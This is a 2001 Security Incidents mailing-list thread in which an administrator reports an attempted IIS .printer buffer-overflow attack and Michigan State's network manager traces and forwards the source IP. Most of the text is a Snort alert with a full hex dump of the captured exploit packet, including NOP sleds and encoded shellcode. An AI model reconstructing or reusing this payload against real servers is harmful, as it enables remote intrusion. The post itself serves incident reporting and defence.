Security Incidents mailing list archives

Re: Attempted WEB-IIS printer attempt Buffer Overflow

From: Doug Nelson <nelson () clunix cl msu edu>
Date: Tue, 17 Jul 2001 11:15:05 -0400 (EDT)

Date of Attack:  Jul 14, 2001
Time of Attack: 09:00:38 am EDT

Source of Attack: 
IP Address: 198.109.163.170

Destination of Attack:
IP Address: 216.18.61.98
Port: 80
Protocol: TCP


Description: 
- Intruder attempted to access the printer isapi filter.

Link: http://www.whitehats.com/info/IDS533


The IP address in question belongs to AT&T Broadband and Information
Services in East Lansing.  I have passed your message on to
"abuse () tcimet net" for further action.

Doug Nelson                     nelson () msu edu
Network Manager                 Ph: (517) 353-2980
Computer Laboratory
Michigan State University

[**] WEB-IIS printer attempt [**]
Jul 14,01 09:00:38am    198.109.163.170:3265 -> 216.18.61.98:80
TTL: 46 TOS: 0x0        ID:1675
***AP*** Seq: 3550615295 Ack: 2075228853 Win: 32120

474554202F4E554C4C2E7072696E746572204854       GET./NULL.printer.HT
54502F312E300D0A4265617675683A2090909090        TP/1.0..Beavuh:.....
90909090909090909090909090909090EB035DEB        ..................].
05E8F8FFFFFF83C5159090908BC533C966B9D702        ..............3.f...
5080309540E2FA2D959564E214ADD8CF0595E196        P.0.@..-..d.........
DD7E607D95959595C81E40147F9A6B6A6A1E4D1E        .~`}......@...kjj.M.
E6A996661EE3ED96661EEBB5966E1EDB81A678C3        ...f....f....n....x.
C2C41EAA966E1E672C9B9595956633E19DCCCA16        .....n.g,....f3.....
5291D07772CCCACB1E581ED3B1965644749654A6        R..wr....X....VDt.T.
5CF31E9D1ED389965654749796541E9596561E67        \.......VTt..T...V.g
1E6B1E452C9E9595957DE1949595A655391055E0        .k.E,....}.....U9.U.
6CC7C36AC241CF1E4D2C939595957DCE94959552        l..j.A..M,....}....R
D2F19995959552D2FD9595959552D2F994959595        ......R......R......
FF9518D2F1C518D285C518D281C56AC255FF9518        ..............j.U...
D2F1C518D28DC518D289C56AC25552D2B5D19595        ...........j.UR.....
9518D2B5C56AC2511ED2851CD2C91CD2F51ED289        .....j.Q............
1CD2CD14DAD994949595F352D2C5959518D2E5C5        ...........R........
18D2B5C5A655C5C5C5FF94C5C57D95959595C814        .....U.......}......
78D56B6A6AC0C56AC25D6AE2856AC2716AE2896A        x.kjj..j.]j..j.qj..j
C271FD95919595FFD56AC2451E7DC5FD94949595        .q.......j.E.}......
6AC27D10559A103F959595A655C5D5C5D5C56AC2        j.}.U..?....U.....j.
79166D6A9A11029595951E4DF352929795F352D2        y.mj.......M.R....R.
9796ED52D291AA8D3EB6FF851892C5C66AC261FF        ...R....>.......j.a.
A76AC249A65CC4C3C4C4C46AE2816AC2591055E1        .j.I.\.....j..j.Y.U.
F50505050515AB95E1BA05050505FF95C3FD9591        ....................
9595C06AE2816AC24D1055E1D505050505FF956A        ...j..j.M.U........j
A3C0C66AC26D166D6AE1BB050505057E27FF95FD        ...j.m.mj......~'...
95919595C0C66AC2691055E98D05050505E109FF        ......j.i.U.........
95C3C5C06AE28D6AC241FFA76AC2497E1FC66AC2        ....j..j.A..j.I~..j.
65FF956AC275A655391055E06CC4C7C3C66A47CF        e..j.u.U9.U.l....jG.
CC3E777B56D2F0E1C5E7FAF6D4F1F1E7F0E6E695        .>w{V...............
D9FAF4F1D9FCF7E7F4E7ECD495D6E7F0F4E1F0C5        ....................
FCE5F095D2F0E1C6E1F4E7E1E0E5DCFBF3FAD495        ....................
D6E7F0F4E1F0C5E7FAF6F0E6E6D495C5F0F0FEDB        ....................
F4F8F0F1C5FCE5F095D2F9FAF7F4F9D4F9F9FAF6        ....................
95C2E7FCE1F0D3FCF9F095C7F0F4F1D3FCF9F095        ....................
C6F9F0F0E595D0EDFCE1C5E7FAF6F0E6E695D6F9        ....................
FAE6F0DDF4FBF1F9F095C2C6DAD6DEA6A795C2C6        ....................
D4C6E1F4E7E1E0E595E6FAF6FEF0E195F6F9FAE6        ....................
F0E6FAF6FEF0E195F6FAFBFBF0F6E195E6F0FBF1        ....................
95E7F0F6E395F6F8F1BBF0EDF0950D0A486F7374        ................Host
3A20909090909090909090909090909090909090        :...................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
9090909090909090909090909090909090909090        ....................
909090909090909090909033C0B09003D88B038B        ...........3........
406033DBB32403C3FFE0EBB9909005318C6A0D0A        @`3..$.........1.j..
0D0A                                            ..                  


---
Jason Robertson                
Network Analyst            
jason () ifutureinc com    
http://www.astroadvice.com




----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com

Current thread:

Attempted WEB-IIS printer attempt Buffer Overflow Jason Robertson (Jul 17)
- Re: Attempted WEB-IIS printer attempt Buffer Overflow Doug Nelson (Jul 17)